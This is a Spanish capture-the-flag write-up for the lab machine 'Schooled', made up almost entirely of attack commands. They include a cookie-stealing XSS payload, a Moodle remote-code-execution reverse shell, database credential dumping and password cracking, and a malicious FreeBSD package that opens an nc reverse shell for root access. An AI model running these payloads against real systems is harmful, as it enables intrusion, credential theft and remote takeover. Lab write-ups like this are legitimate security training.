# Schooled

**OS**: FreeBSD \
**Dificultad**: Medio \
**Puntos**: 30

## Resumen

## Nmap Scan

`nmap -sV -sC -p- -oN nmap.txt 10.10.10.234`

```
Nmap scan report for 10.10.10.234
Host is up (0.074s latency).
Not shown: 65532 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.9 (FreeBSD 20200214; protocol 2.0)
| ssh-hostkey: 
|   2048 1d:69:83:78:fc:91:f8:19:c8:75:a7:1e:76:45:05:dc (RSA)
|   256 e9:b2:d2:23:9d:cf:0e:63:e0:6d:b9:b1:a6:86:93:38 (ECDSA)
|_  256 7f:51:88:f7:3c:dd:77:5e:ba:25:4d:4c:09:25:ea:1f (ED25519)
80/tcp    open  http    Apache httpd 2.4.46 ((FreeBSD) PHP/7.4.15)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.46 (FreeBSD) PHP/7.4.15
|_http-title: Schooled - A new kind of educational institute
33060/tcp open  mysqlx?
| fingerprint-strings: 
|   DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp: 
|     Invalid message"
|     HY000
|   LDAPBindReq: 
|     *Parse error unserializing protobuf message"
|     HY000
|   oracle-tns: 
|     Invalid message-frame."
|_    HY000
```

## Enumeración

`<img src=x onerror=this.src='http://10.10.14.224/?'+document.cookie;>`
`http://moodle.schooled.htb/moodle/blocks/rce/lang/en/block_rce.php?cmd=id`
`http://moodle.schooled.htb/moodle/blocks/rce/lang/en/block_rce.php?cmd=/bin/bash+-c+%27bash+-i+%3E+/dev/tcp/10.10.14.33/1234+0%3E%261%27`

## Escalada de Privilegios (User)

`/usr/local/bin/python3 -c 'import pty; pty.spawn("/bin/bash")'`
`cat /usr/local/www/apache24/data/moodle/config.php`

```
$CFG->dbtype    = 'mysqli';
$CFG->dblibrary = 'native';
$CFG->dbhost    = 'localhost';
$CFG->dbname    = 'moodle';
$CFG->dbuser    = 'moodle';
$CFG->dbpass    = 'PlaybookMaster2020';
```

`/usr/local/bin/mysql -u moodle -pPlaybookMaster2020 -D moodle`
`select username,password from mdl_user;`
`john hash.txt -wordlist=/usr/share/wordlists/rockyou.txt`

```
jamie : !QAZ2wsx
```

`ssh jamie@10.10.10.234`


## Escalada de Privilegios (Root)

`sudo -l`
`gem install --no-document fpm`

`mkdir shell`
`echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.33 4444 >/tmp/f' > shell/test.sh`
`fpm -n test -s dir -t freebsd -a all --before-install shell/test.sh shell`
`scp test-1.0.txz jamie@10.10.10.234://home/jamie/test-1.0.txz`
`sudo pkg install -y --no-repo-update ./test-1.0.txz`


## Referencias
https://github.com/HoangKien1020/CVE-2020-14321 \
https://github.com/HoangKien1020/Moodle_RCE \
https://vimeo.com/441698193 \
https://gtfobins.github.io/gtfobins/pkg/